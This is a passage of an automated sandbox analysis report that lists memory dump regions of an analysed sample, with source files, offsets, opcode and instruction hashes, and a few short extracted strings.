                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5cd138e800805a0080b4e17efdbe81587cbba28bdc3d258f2a9f406d4134012e
                                          • Instruction ID: c1ce9ffe8a2e6384995a293715540af1e4c6e2043650d2de45e63c28305df4fb
                                          • Opcode Fuzzy Hash: 5cd138e800805a0080b4e17efdbe81587cbba28bdc3d258f2a9f406d4134012e
                                          • Instruction Fuzzy Hash: 3AE0EC74D55208DFCB84DFB8D5496ADBBF8AB08211F1044A9D84993351E7315A50CB51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 256225f9b66edfbdafa5a02d7789b686518da92d0d58d11f41b39e8c5c22a2f1
                                          • Instruction ID: ecdd3b9fd3a7ae8d48b51748a2dc5d0d49305affb79f0ae954badf9c7a4b6cc1
                                          • Opcode Fuzzy Hash: 256225f9b66edfbdafa5a02d7789b686518da92d0d58d11f41b39e8c5c22a2f1
                                          • Instruction Fuzzy Hash: 26E0C27184210CEFCBC1EBF88C0059E77FCDB46200F1080E5C504A3510ED364A00DB62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a16d830bc434b2283c4dd8a9448125c8a51d2420bc16efe4d05ab8ccd85fdb38
                                          • Instruction ID: 57f025d9d09255da63f79b8694915fdeec38959745463b6f39c17cfbe31c0db9
                                          • Opcode Fuzzy Hash: a16d830bc434b2283c4dd8a9448125c8a51d2420bc16efe4d05ab8ccd85fdb38
                                          • Instruction Fuzzy Hash: CDE0C2B188210CEFC7C1EBF488006AEB7FCDB45200F4080E5C111A3110ED324A00DB62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 610ba79568f4a62953c101923b8b2ef7383d07c3097700adfe12788e0eb72c9c
                                          • Instruction ID: af0d31f58e776a0af9b0cd1dc35d22bfed959bd7d99168b588d1a1c1f88bf44c
                                          • Opcode Fuzzy Hash: 610ba79568f4a62953c101923b8b2ef7383d07c3097700adfe12788e0eb72c9c
                                          • Instruction Fuzzy Hash: F9E0C278D08208EFCB04EFA4E4405ACBBB4FB86314F10D099C80813341CA329E02CF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eaeafa15b93ec9f63b8c51d02751c25a2890bddf3d6af58ac910d848a59845d7
                                          • Instruction ID: c27f4cf27aa302f6d251fe2f893039818ef2b54aa2affee60af7aacafdb781cc
                                          • Opcode Fuzzy Hash: eaeafa15b93ec9f63b8c51d02751c25a2890bddf3d6af58ac910d848a59845d7
                                          • Instruction Fuzzy Hash: DBE0C2B188210CEFCBC1FFF8C8005AE77F8DB45200F1080E58500A3110ED324A00DB62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2134217178.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e30000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2575974d660e45f2ca4fc92e5e6bde71e36dd16b4207dc06567925542b5826c0
                                          • Instruction ID: 564d2df7c43c89512e558beaa98a39028979674898ddcc9d07beb1a8c4dfd793
                                          • Opcode Fuzzy Hash: 2575974d660e45f2ca4fc92e5e6bde71e36dd16b4207dc06567925542b5826c0
                                          • Instruction Fuzzy Hash: E1E0C27184220CEFCBC1EBF89C0069EB7FDDF45310F1080E69001A3210ED724A00DB62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c15d11516ac57418c9af9ff76a5d91ab4894af58fdbafe6f7cf6802ca376047
                                          • Instruction ID: 6e98be2147b9404cc61ae9947185d2f2dcbbaf6eaa43e18604d7b306a9c40825
                                          • Opcode Fuzzy Hash: 7c15d11516ac57418c9af9ff76a5d91ab4894af58fdbafe6f7cf6802ca376047
                                          • Instruction Fuzzy Hash: 0BD02B9008B3800FC2D36368DC042797FE80B43136F04C095E18887443C9744424CBB3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efe66ae7696b2470d29c66fb419f9b02700025828e613aa9cf295a3e7d1abeec
                                          • Instruction ID: c1bf4eb8f012000a5875e1780faa811c7b5ab42dee44ae632a18eae832a0ff02
                                          • Opcode Fuzzy Hash: efe66ae7696b2470d29c66fb419f9b02700025828e613aa9cf295a3e7d1abeec
                                          • Instruction Fuzzy Hash: D0E01230A11208EFCB04EFB8E951A6EB7FAEB45600F1085A9D90997244DE355F01DBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa712508d229e77c42126fbc86d9768ade69ca8e45dd9e5683a2ffd9fb88ef65
                                          • Instruction ID: caa1567adf03fe22cb69bf42dd962028f6501960e4c0493de37e925e6508f67d
                                          • Opcode Fuzzy Hash: fa712508d229e77c42126fbc86d9768ade69ca8e45dd9e5683a2ffd9fb88ef65
                                          • Instruction Fuzzy Hash: F4D0A774909108DFC744CBD4D440A69B7FCEB45314F20C0AD980857342CE339D01CBE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac21017e76de2905639940a9e454facaa3eb304d2a7a0e61329ada64abc41f7f
                                          • Instruction ID: 9b98a6911e68656f7ea6b53eb9b0356304084599c0507f298e30342058d04849
                                          • Opcode Fuzzy Hash: ac21017e76de2905639940a9e454facaa3eb304d2a7a0e61329ada64abc41f7f
                                          • Instruction Fuzzy Hash: EBE01AB0904118DFD750EF78D9896CEBBB1EB4A711F008499E78AA3244DB786D80CFA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b47ddc903044856fb767d55cf578769e677baaef537f0adadba05ed1a0c68cf2
                                          • Instruction ID: 6c922e5fc76ba4cebcb8d5c0c33bf66578183c8495ac84cf2c818dada2bc41f0
                                          • Opcode Fuzzy Hash: b47ddc903044856fb767d55cf578769e677baaef537f0adadba05ed1a0c68cf2
                                          • Instruction Fuzzy Hash: E9E01230A05209EFCB44EFF8E90169D77F9EB45300F1441A9D80DD7745DA355F019791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8cccacd0834aff7a5b0fa81a03105725704098f8f2e8c44292dba4977ca83a4a
                                          • Instruction ID: ea8fbd242bd002e8b71a5dc058fb9382cf80baf2cecf899f1defa0550dc0bbc1
                                          • Opcode Fuzzy Hash: 8cccacd0834aff7a5b0fa81a03105725704098f8f2e8c44292dba4977ca83a4a
                                          • Instruction Fuzzy Hash: A1E01A30A04219CFEBA4EF68E895F9D77B2EB45710F1041D8D20EA7396DA346E848F30
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 597a8ad2612ce9130916926486a5d1783db2600754ec987d63d1128bcc14b2d5
                                          • Instruction ID: 374bc8fe6dc7f799ffab74018d6416098a4296dc319d5065822b999d02048408
                                          • Opcode Fuzzy Hash: 597a8ad2612ce9130916926486a5d1783db2600754ec987d63d1128bcc14b2d5
                                          • Instruction Fuzzy Hash: 63E01A34A002189FEBA4EF68D4947AD77B1EB8A310F008099A14E63644CE346EC99F21
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 64fbd4f9b8a8dd22847c7cd28cf249682bf37b8b9c28d7897e14b23e659bd986
                                          • Instruction ID: b3bc26d5cad6f2487ea0ab212bd9121ba7296c188952020b23e55f5eb0b1feb9
                                          • Opcode Fuzzy Hash: 64fbd4f9b8a8dd22847c7cd28cf249682bf37b8b9c28d7897e14b23e659bd986
                                          • Instruction Fuzzy Hash: 60E04F30A01214CFEB50EF68E895B9D77B2EB45710F1044D8E24AA3385CA34AE44CF31
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a15e3c2e50c669778a2404149b1f10e4bf3414dc9ca1788f6718520d10f1b18
                                          • Instruction ID: afd8d1af6e965efd98160cca84c14a0464478e4f6bfae1636c1574d8a88a6056
                                          • Opcode Fuzzy Hash: 2a15e3c2e50c669778a2404149b1f10e4bf3414dc9ca1788f6718520d10f1b18
                                          • Instruction Fuzzy Hash: 0CE01A30A002588FDB50EFA8D89579E77B2FB89310F0085D9920AB3285DB746D84DF20
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c117d8d6a425a0485cbb7844f39370b7a12c19f733343caca4ce7eb752106ab
                                          • Instruction ID: c4df7859d41f94b4f37988aedee5a8c966341effc9e20c8b6f2c08ce9d22a9fb
                                          • Opcode Fuzzy Hash: 2c117d8d6a425a0485cbb7844f39370b7a12c19f733343caca4ce7eb752106ab
                                          • Instruction Fuzzy Hash: A3E01270900119DFD768EF68D4867AD7771FB45314F0040A9D70963645DA385D84DF65
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 880cfa503de395a9c56c8a8f374e9b594a551dd8ce145b5a9d2ba505b088828c
                                          • Instruction ID: 41e589366ccea3911787ead341fb0c803adf74a15a7a39f760db6ce8f5950066
                                          • Opcode Fuzzy Hash: 880cfa503de395a9c56c8a8f374e9b594a551dd8ce145b5a9d2ba505b088828c
                                          • Instruction Fuzzy Hash: 39E04F30A0015ACFD764EF18D8987AC77B2FB88314F0000A8D10AB7746DB386D85DF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a7848ef53de2bf2586ed3ad490057a4d2367c202d27ac27009363a27d703a26
                                          • Instruction ID: 087212fdaf0e9483d76f43793cb26574c52ea0831b1a7d8608a0ebc8f0419031
                                          • Opcode Fuzzy Hash: 5a7848ef53de2bf2586ed3ad490057a4d2367c202d27ac27009363a27d703a26
                                          • Instruction Fuzzy Hash: 1ED0C7351493D46FCB034B65AC14C997F696A4770071880A6E1558F6A3CB21D416DBE5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7248a2ad395c61f87ca4a27836531439baafe284635bec571e312b911358592
                                          • Instruction ID: f21a37b14b825293417f041e0422fddb30820c0263e11b6931288bfbdcb20aee
                                          • Opcode Fuzzy Hash: e7248a2ad395c61f87ca4a27836531439baafe284635bec571e312b911358592
                                          • Instruction Fuzzy Hash: 0AD0C979144204AFC700DF69DD45E867BADEB49650F1650A1F5084F232C722E421DAB4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78b70252ac22ec93fc08d677785f5d0b220f2b24b3ae6ccd44cd5fdefae4a9d9
                                          • Instruction ID: 4dd68c350ac9a6d977d9df9260140384132697cb6bfb791da232a0e11b0ad1f1
                                          • Opcode Fuzzy Hash: 78b70252ac22ec93fc08d677785f5d0b220f2b24b3ae6ccd44cd5fdefae4a9d9
                                          • Instruction Fuzzy Hash: 22D05EB0A9472ECFDF509F28D864BE93BB5BB45304F0055A4C00A67294EB740F858F52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 32131a53b129c2a8d9fd80a167f439705d2efef920ed27e1088187f34dc8e847
                                          • Instruction ID: 8d1b12495b480574a9e8ed44adc7e48e433c075193cd6b85487bc90698b494a9
                                          • Opcode Fuzzy Hash: 32131a53b129c2a8d9fd80a167f439705d2efef920ed27e1088187f34dc8e847
                                          • Instruction Fuzzy Hash: 61C08CA00826084AC5D17BE8E80833CB7E86B81227F40C060920C628034E798010CAB7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6b5c9108f50a375a4e5a414dfd49b78f8c04b37928d4050d26a35827a61b241c
                                          • Instruction ID: a20048f91ca8a29fd0d118e7ad9cca6202a79a5ffe857463c3f8f0953e47316e
                                          • Opcode Fuzzy Hash: 6b5c9108f50a375a4e5a414dfd49b78f8c04b37928d4050d26a35827a61b241c
                                          • Instruction Fuzzy Hash: 1BB0922005E7D53E824327210C20EA61E25B8C61083CA04C26040CAAA389080A5493A2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6b7e4d9ab538ec835e430e5d45742dd9e7812e2b3d690bf6a7a6a9b2acac2b1
                                          • Instruction ID: 6b955b14552c3d2776d714125df979a0782b741e58d0790c058b922ea2915e4a
                                          • Opcode Fuzzy Hash: f6b7e4d9ab538ec835e430e5d45742dd9e7812e2b3d690bf6a7a6a9b2acac2b1
                                          • Instruction Fuzzy Hash: 6EC08C30504104AFFB806FACD05922E3B22D781B64F00C408930637AA9CE396C068B70
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27b17667007cc95d255cd2e97f3e7fa4745f8442714ce40f779b6d0ff2eaeb29
                                          • Instruction ID: 5bc84aa104614bc0f6e44f9008f616a7e9a16873413634e8b7e03b6528651ef0
                                          • Opcode Fuzzy Hash: 27b17667007cc95d255cd2e97f3e7fa4745f8442714ce40f779b6d0ff2eaeb29
                                          • Instruction Fuzzy Hash: 7AC04C76E1011E9BCF14DBD9E4419DCF7B4EF94322F008036D214A7104D6315526CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f7805f1a4a58f02092cfc799301ee295bd6c82b0bb1f4631bceed25fae084066
                                          • Instruction ID: 942f6226cd305c2f44d3bd0202f5305c44f113b4ff986e91d25732a58ad7ca0f
                                          • Opcode Fuzzy Hash: f7805f1a4a58f02092cfc799301ee295bd6c82b0bb1f4631bceed25fae084066
                                          • Instruction Fuzzy Hash: 6FB09232000308AB87019B84E804895BF69AB5A700B04C025A60986221CB32A822DAA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133358737.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69d0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TJoq$Tejq$xbmq
                                          • API String ID: 0-903294719
                                          • Opcode ID: 6b7e8886a86ab0d2e59accd382c30ecba94b804e9d312f8921a2bb80ac28c9bd
                                          • Instruction ID: 17b2a1384dfd9c27b51ca1dcbfadccd4a75edfa9be425ae8b5e6f34d06e51f9c
                                          • Opcode Fuzzy Hash: 6b7e8886a86ab0d2e59accd382c30ecba94b804e9d312f8921a2bb80ac28c9bd
                                          • Instruction Fuzzy Hash: 1BC15875E016188FDB58DF6AC9446DDBBF2AF89300F14C1AAD909AB365DB305E81CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133888886.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ca0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (nq$,nq
                                          • API String ID: 0-719044535
                                          • Opcode ID: b6b8563705946a4c719c62d10f2f3ccd758b90d4a453c9c7eb6036dfc3aa67e9
                                          • Instruction ID: 4c2f7ca325b010ef44f591eff51da85263efe3b2f6e67f6947540b6ef374d956
                                          • Opcode Fuzzy Hash: b6b8563705946a4c719c62d10f2f3ccd758b90d4a453c9c7eb6036dfc3aa67e9
                                          • Instruction Fuzzy Hash: 13D12A34A006058FCB54DF69C584AAEB7F6FF88314F2985A9E406EB765C734ED81CB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: 3ba297145be64a2e4eb9168a6cde834f9f118fc0f015f7cd45e35ee3540477c6
                                          • Instruction ID: 1aee0add249cb6f8c0aa16a14f1439d1052f471f1653559cde1bd0cf1a498dc6
                                          • Opcode Fuzzy Hash: 3ba297145be64a2e4eb9168a6cde834f9f118fc0f015f7cd45e35ee3540477c6
                                          • Instruction Fuzzy Hash: 48C10570E04208CFEB94DFA9D884B9DBBF2FB89304F2494AAD509A7654DB705985CF60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Tejq
                                          • API String ID: 0-2468842661
                                          • Opcode ID: f161c653afa6c22d48ba519a0c832a54a5b75f06b9c7cea91601de304e7fd62d
                                          • Instruction ID: 59aa4025391cff47da2e6c0422b1260815e6f45b70d137f76239a4fc680bb822
                                          • Opcode Fuzzy Hash: f161c653afa6c22d48ba519a0c832a54a5b75f06b9c7cea91601de304e7fd62d
                                          • Instruction Fuzzy Hash: ECB13570E04218CFEF94DFADD884BADBBF2BB89304F20906AD109A7655DB305985CF60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 1
                                          • API String ID: 0-2212294583
                                          • Opcode ID: d886eacc71e66ff57447cb6500c72371fe13542dbd1b5d8f66b1e58ca138c0da
                                          • Instruction ID: c47b7f2157c8c619eb54b704220bdeec949f07436fc8ea3241d540548b91376d
                                          • Opcode Fuzzy Hash: d886eacc71e66ff57447cb6500c72371fe13542dbd1b5d8f66b1e58ca138c0da
                                          • Instruction Fuzzy Hash: 66414C71E05A588BEB5CCF6B9C4069AFAF3AFC9301F18D1B9D848AA215EB300541CF55
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132942549.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_68f0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f697eb928ebe444c247894ba5941d5dda5768cee27804e0cd235801465d7b60d
                                          • Instruction ID: 9db632f149f5db5b009a1994d8c32c54cba21c04512d566d38335e2eaa589723
                                          • Opcode Fuzzy Hash: f697eb928ebe444c247894ba5941d5dda5768cee27804e0cd235801465d7b60d
                                          • Instruction Fuzzy Hash: F7026B70B112199FDB48DF69C49466EFBF2FF88300F248629D65AD7381DB34A951CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133231980.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6990000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 410e82c20d5c1dd345504f8811f7f9ca15c00e7e2a4951165d880c36cb0366eb
                                          • Instruction ID: b925f68b6d9d3eaf87df8f34e491ae386b310173473c28a82a78aeb4ca6ff266
                                          • Opcode Fuzzy Hash: 410e82c20d5c1dd345504f8811f7f9ca15c00e7e2a4951165d880c36cb0366eb
                                          • Instruction Fuzzy Hash: 7D12A170E106199BDB54CFAEC98069DFBF2BF88304F24C569D418EB61AD734AA46CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ad4460681c9bb8f21f72c77328e4a5be72c8697195fc9ee50b3408a98b273236
                                          • Instruction ID: d3e73418f27585c52cf2bb22b64eb72e6219cfc6467ea14c69daff7ccaa07215
                                          • Opcode Fuzzy Hash: ad4460681c9bb8f21f72c77328e4a5be72c8697195fc9ee50b3408a98b273236
                                          • Instruction Fuzzy Hash: 58B15E70E04218DFEB84EFA8D44479EBBB2FB89310F509069D109A7759DB34AD45CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2111646564.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_24e0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35068a4189ca34a388837c5427f2331c5046439d7ca54808bd0b51d64498fcd8
                                          • Instruction ID: 0467e9932bc549fdbfe302878a1e6271e52bf25f43ff1d966a703ac07ca0ef54
                                          • Opcode Fuzzy Hash: 35068a4189ca34a388837c5427f2331c5046439d7ca54808bd0b51d64498fcd8
                                          • Instruction Fuzzy Hash: F1A18036E002198FDF05DFB5C84499EB7B2FF85305B15856AE802BB221DB71E91ACF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133325507.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 79e6e92084c6874995ff7af9bf5d9a5483be8319a4e6f11d63fd40bab5e3b30f
                                          • Instruction ID: a194ca85ee88f1e3da9e1d5e7fec659c9dde1454be905789567e5a9db44b8e90
                                          • Opcode Fuzzy Hash: 79e6e92084c6874995ff7af9bf5d9a5483be8319a4e6f11d63fd40bab5e3b30f
                                          • Instruction Fuzzy Hash: 24B16D70E04218DFEB84EFA8D44479EBBB2FB89310F109069D109A7759DB34AD85CF61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133271608.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 30c04e830a1bfe66317db877db5948171900dfc15b4d9ab11e7bd6227b23d253
                                          • Instruction ID: 728b979972361fa2d14ae624b325f4cb122481b73d2938e8b12778616a5a1eac
                                          • Opcode Fuzzy Hash: 30c04e830a1bfe66317db877db5948171900dfc15b4d9ab11e7bd6227b23d253
                                          • Instruction Fuzzy Hash: DDB10474E04218CFDB94DFA4C945BADBBF6FB89300F1094AAD409AB291DB345E85CF91
